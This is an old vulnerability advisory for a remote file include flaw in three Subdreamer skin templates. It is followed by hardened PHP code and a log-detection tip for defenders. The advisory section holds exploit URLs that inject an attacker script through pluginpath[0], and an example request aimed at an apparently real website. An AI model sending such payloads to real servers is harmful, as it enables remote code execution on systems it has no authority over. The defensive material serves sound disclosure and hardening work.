example: http://www.luchino.com.br/skins/bobbyzhuo/bobby1.php?pluginpath[0]=teeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee

---------------------------------------------------------------------------
Subdreamer templates - Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Discovered By fluffy_bunny [ Romanian Security Team ] : hTTp://RSTZONE.NET :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subdreamer Skins:
1. bobbyzhuo
2. gate_to_americana
3. refresh

------------------------------------------------------------------

Exploit:
~~~~~~~
The variable $pluginpath[0] is not sanitized. With register_globals=on, an attacker can exploit this vulnerability with a simple PHP injection script.

# http://www.site.com/[path]/skins/bobbyzhuo/bobby1.php?pluginpath[0]=[EvilScript]
# http://www.site.com/[path]/skins/gate_to_americana/gta1.php?pluginpath[0]=[EvilScript]
# http://www.site.com/[path]/skins/refresh/design1.php?pluginpath[0]=[EvilScript]

---------------------------------------------------------------------------
*/

Contact:
~~~~~~~
Nick: fluffy_bunny
Homepage: hTTp://RSTZONE.NET [ in construction ]

/*
-------------------------------- [ EOF] ----------------------------------
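For defenders, the root cause above is an include whose path is built from a request-controlled variable that only exists because register_globals is on. The following is an added example of the hardened pattern, not code from the advisory or from Subdreamer; the `plugin` parameter, the `plugins/` directory and the allow-list of plugin names are assumptions for illustration.

```php
<?php
// Added example (not Subdreamer's own code): a skin template resolving its
// plugin include safely. Assumed names: $_GET['plugin'], plugins/ directory,
// and the allow-list below.

// Never rely on register_globals: read request input explicitly, from one
// named parameter, instead of letting the client define $pluginpath.
$requestedPlugin = isset($_GET['plugin']) ? (string) $_GET['plugin'] : 'default';

// Allow-list of plugin names the template may include (assumed values).
$allowedPlugins = array('default', 'news', 'gallery');

function resolvePluginPath($name, array $allowed, $baseDir)
{
    // Exact match against the allow-list rejects URLs ("http://..."),
    // traversal ("../"), wrappers ("php://") and null bytes by construction.
    if (!in_array($name, $allowed, true)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');

    // realpath() returns false for a missing file; also confirm the resolved
    // file still lives inside $baseDir (defence in depth for the allow-list).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Hardening checks worth logging at startup: both settings should be Off.
if (ini_get('register_globals') || ini_get('allow_url_include')) {
    error_log('insecure php.ini: register_globals/allow_url_include enabled');
}

$pluginFile = resolvePluginPath($requestedPlugin, $allowedPlugins, __DIR__ . '/plugins');
if ($pluginFile === null) {
    http_response_code(400);
    exit('Unknown plugin');
}

// Only an allow-listed, on-disk file under plugins/ reaches this include.
include $pluginFile;
```

Requests carrying a URL in an include-related parameter (such as `pluginpath[0]=http://...`) are a useful web-log detection signal for the class of issue this advisory describes.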